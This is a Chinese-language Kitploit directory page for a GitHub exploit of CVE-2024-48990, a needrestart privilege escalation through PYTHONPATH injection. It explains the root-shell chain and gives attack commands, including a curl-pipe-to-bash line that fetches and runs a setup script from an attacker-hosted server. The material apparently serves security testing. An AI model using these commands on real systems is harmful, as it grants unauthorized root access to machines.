Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/mladicstefan/cve-2024-48990
权限提升漏洞分析漏洞利用渗透测试红队Payload 开发
GitHubmladicstefan/cve-2024-48990

CVE-2024-48990

针对 needsrestart 的 setuid root shell 的完整漏洞利用代码

查看仓库
9个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-48990 漏洞利用

通过 PYTHONPATH 注入在 needrestart < 3.8 中实现本地权限提升。

工作原理

  1. needrestart 以 root 身份运行并扫描所有进程
  2. 找到我们的 Python 进程,从 /proc/[pid]/environ 读取 PYTHONPATH=/tmp/.m
  3. 以 root 身份执行 Python,并携带我们恶意的 PYTHONPATH
  4. Python 的 import 加载 /tmp/.m/importlib/__init__.so(我们的恶意库)
  5. .so 中的构造函数在 Python 启动前以 root 身份执行
  6. 在 /tmp/rootbash 创建 SUID bash
  7. 执行 /tmp/rootbash -p 获取 root shell

关键点: needrestart 信任来自非特权进程的环境变量,并在以 root 身份执行解释器时使用它们。

用法

攻击者:

root@kitploit:~
./compile.sh
python3 -m http.server 8000

目标:

root@kitploit:~
curl -sf http://10.10.14.109:8000/setup_exploit.sh | bash -s 10.10.14.109 8000
cd /tmp/.m && PYTHONPATH=/tmp/.m python3 e.py

在第二个终端中执行以下命令后,e.py 进程应挂起并生成 root 权限:

root@kitploit:~
sudo needsrestard

第一个终端将启动 root shell。

致谢

Qualys 威胁研究单位 - CVE-2024-48990

下载工具